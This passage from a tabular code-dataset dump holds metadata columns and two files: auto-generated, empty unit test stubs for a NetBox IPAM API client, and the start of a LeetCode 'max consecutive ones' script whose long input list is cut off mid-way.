| 0.939436
| 0.929486
| 0.844783
| 0.829988
| 0.825489
| 0.825489
| 0
| 0
| 0.045384
| 16,790
| 126
| 233
| 133.253968
| 0.721113
| 0.049732
| 0
| 0
| 0
| 0
| 0.438117
| 0.292889
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011494
| 0
| 0.011494
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2e19aa45383db9286c61545abbf7b844a606dce1
| 7,569
|
py
|
Python
|
test/test_ipam_api.py
|
nrfta/python-netbox-client
|
68ba6dd4d7306513dc1ad38f3ac59122ba4f70a8
|
[
"MIT"
] | null | null | null |
test/test_ipam_api.py
|
nrfta/python-netbox-client
|
68ba6dd4d7306513dc1ad38f3ac59122ba4f70a8
|
[
"MIT"
] | null | null | null |
test/test_ipam_api.py
|
nrfta/python-netbox-client
|
68ba6dd4d7306513dc1ad38f3ac59122ba4f70a8
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
NetBox API
API to access NetBox # noqa: E501
OpenAPI spec version: 2.8
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import netbox_client
from netbox_client.api.ipam_api import IpamApi # noqa: E501
from netbox_client.rest import ApiException
class TestIpamApi(unittest.TestCase):
"""IpamApi unit test stubs"""
def setUp(self):
self.api = netbox_client.api.ipam_api.IpamApi() # noqa: E501
def tearDown(self):
pass
def test_ipam_aggregates_create(self):
"""Test case for ipam_aggregates_create
"""
pass
def test_ipam_aggregates_delete(self):
"""Test case for ipam_aggregates_delete
"""
pass
def test_ipam_aggregates_list(self):
"""Test case for ipam_aggregates_list
"""
pass
def test_ipam_aggregates_partial_update(self):
"""Test case for ipam_aggregates_partial_update
"""
pass
def test_ipam_aggregates_read(self):
"""Test case for ipam_aggregates_read
"""
pass
def test_ipam_aggregates_update(self):
"""Test case for ipam_aggregates_update
"""
pass
def test_ipam_ip_addresses_create(self):
"""Test case for ipam_ip_addresses_create
"""
pass
def test_ipam_ip_addresses_delete(self):
"""Test case for ipam_ip_addresses_delete
"""
pass
def test_ipam_ip_addresses_list(self):
"""Test case for ipam_ip_addresses_list
"""
pass
def test_ipam_ip_addresses_partial_update(self):
"""Test case for ipam_ip_addresses_partial_update
"""
pass
def test_ipam_ip_addresses_read(self):
"""Test case for ipam_ip_addresses_read
"""
pass
def test_ipam_ip_addresses_update(self):
"""Test case for ipam_ip_addresses_update
"""
pass
def test_ipam_prefixes_available_ips_create(self):
"""Test case for ipam_prefixes_available_ips_create
"""
pass
def test_ipam_prefixes_available_ips_read(self):
"""Test case for ipam_prefixes_available_ips_read
"""
pass
def test_ipam_prefixes_available_prefixes_create(self):
"""Test case for ipam_prefixes_available_prefixes_create
A convenience method for returning available child prefixes within a parent. # noqa: E501
"""
pass
def test_ipam_prefixes_available_prefixes_read(self):
"""Test case for ipam_prefixes_available_prefixes_read
A convenience method for returning available child prefixes within a parent. # noqa: E501
"""
pass
def test_ipam_prefixes_create(self):
"""Test case for ipam_prefixes_create
"""
pass
def test_ipam_prefixes_delete(self):
"""Test case for ipam_prefixes_delete
"""
pass
def test_ipam_prefixes_list(self):
"""Test case for ipam_prefixes_list
"""
pass
def test_ipam_prefixes_partial_update(self):
"""Test case for ipam_prefixes_partial_update
"""
pass
def test_ipam_prefixes_read(self):
"""Test case for ipam_prefixes_read
"""
pass
def test_ipam_prefixes_update(self):
"""Test case for ipam_prefixes_update
"""
pass
def test_ipam_rirs_create(self):
"""Test case for ipam_rirs_create
"""
pass
def test_ipam_rirs_delete(self):
"""Test case for ipam_rirs_delete
"""
pass
def test_ipam_rirs_list(self):
"""Test case for ipam_rirs_list
"""
pass
def test_ipam_rirs_partial_update(self):
"""Test case for ipam_rirs_partial_update
"""
pass
def test_ipam_rirs_read(self):
"""Test case for ipam_rirs_read
"""
pass
def test_ipam_rirs_update(self):
"""Test case for ipam_rirs_update
"""
pass
def test_ipam_roles_create(self):
"""Test case for ipam_roles_create
"""
pass
def test_ipam_roles_delete(self):
"""Test case for ipam_roles_delete
"""
pass
def test_ipam_roles_list(self):
"""Test case for ipam_roles_list
"""
pass
def test_ipam_roles_partial_update(self):
"""Test case for ipam_roles_partial_update
"""
pass
def test_ipam_roles_read(self):
"""Test case for ipam_roles_read
"""
pass
def test_ipam_roles_update(self):
"""Test case for ipam_roles_update
"""
pass
def test_ipam_services_create(self):
"""Test case for ipam_services_create
"""
pass
def test_ipam_services_delete(self):
"""Test case for ipam_services_delete
"""
pass
def test_ipam_services_list(self):
"""Test case for ipam_services_list
"""
pass
def test_ipam_services_partial_update(self):
"""Test case for ipam_services_partial_update
"""
pass
def test_ipam_services_read(self):
"""Test case for ipam_services_read
"""
pass
def test_ipam_services_update(self):
"""Test case for ipam_services_update
"""
pass
def test_ipam_vlan_groups_create(self):
"""Test case for ipam_vlan_groups_create
"""
pass
def test_ipam_vlan_groups_delete(self):
"""Test case for ipam_vlan_groups_delete
"""
pass
def test_ipam_vlan_groups_list(self):
"""Test case for ipam_vlan_groups_list
"""
pass
def test_ipam_vlan_groups_partial_update(self):
"""Test case for ipam_vlan_groups_partial_update
"""
pass
def test_ipam_vlan_groups_read(self):
"""Test case for ipam_vlan_groups_read
"""
pass
def test_ipam_vlan_groups_update(self):
"""Test case for ipam_vlan_groups_update
"""
pass
def test_ipam_vlans_create(self):
"""Test case for ipam_vlans_create
"""
pass
def test_ipam_vlans_delete(self):
"""Test case for ipam_vlans_delete
"""
pass
def test_ipam_vlans_list(self):
"""Test case for ipam_vlans_list
"""
pass
def test_ipam_vlans_partial_update(self):
"""Test case for ipam_vlans_partial_update
"""
pass
def test_ipam_vlans_read(self):
"""Test case for ipam_vlans_read
"""
pass
def test_ipam_vlans_update(self):
"""Test case for ipam_vlans_update
"""
pass
def test_ipam_vrfs_create(self):
"""Test case for ipam_vrfs_create
"""
pass
def test_ipam_vrfs_delete(self):
"""Test case for ipam_vrfs_delete
"""
pass
def test_ipam_vrfs_list(self):
"""Test case for ipam_vrfs_list
"""
pass
def test_ipam_vrfs_partial_update(self):
"""Test case for ipam_vrfs_partial_update
"""
pass
def test_ipam_vrfs_read(self):
"""Test case for ipam_vrfs_read
"""
pass
def test_ipam_vrfs_update(self):
"""Test case for ipam_vrfs_update
"""
pass
if __name__ == '__main__':
unittest.main()
| 19.65974
| 98
| 0.60761
| 920
| 7,569
| 4.6
| 0.079348
| 0.095936
| 0.150756
| 0.205577
| 0.911626
| 0.720463
| 0.373819
| 0.143667
| 0.045369
| 0.045369
| 0
| 0.00347
| 0.314573
| 7,569
| 384
| 99
| 19.710938
| 0.812259
| 0.401903
| 0
| 0.460938
| 1
| 0
| 0.001919
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.46875
| false
| 0.460938
| 0.039063
| 0
| 0.515625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
2e6e434b058ccda61dc7039007cc4b858b9d6577
| 20,436
|
py
|
Python
|
Practice/PythonApplication/LeetCode/Array/485.py
|
kushalbhola/MyStuff
|
3f1064866487e489af41f8662a875b9954d5d8b0
|
[
"Apache-2.0"
] | null | null | null |
Practice/PythonApplication/LeetCode/Array/485.py
|
kushalbhola/MyStuff
|
3f1064866487e489af41f8662a875b9954d5d8b0
|
[
"Apache-2.0"
] | 1
|
2020-04-29T23:00:26.000Z
|
2020-04-29T23:00:26.000Z
|
Practice/PythonApplication/LeetCode/Array/485.py
|
kushalbhola/MyStuff
|
3f1064866487e489af41f8662a875b9954d5d8b0
|
[
"Apache-2.0"
] | null | null | null |
def main():
input = [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1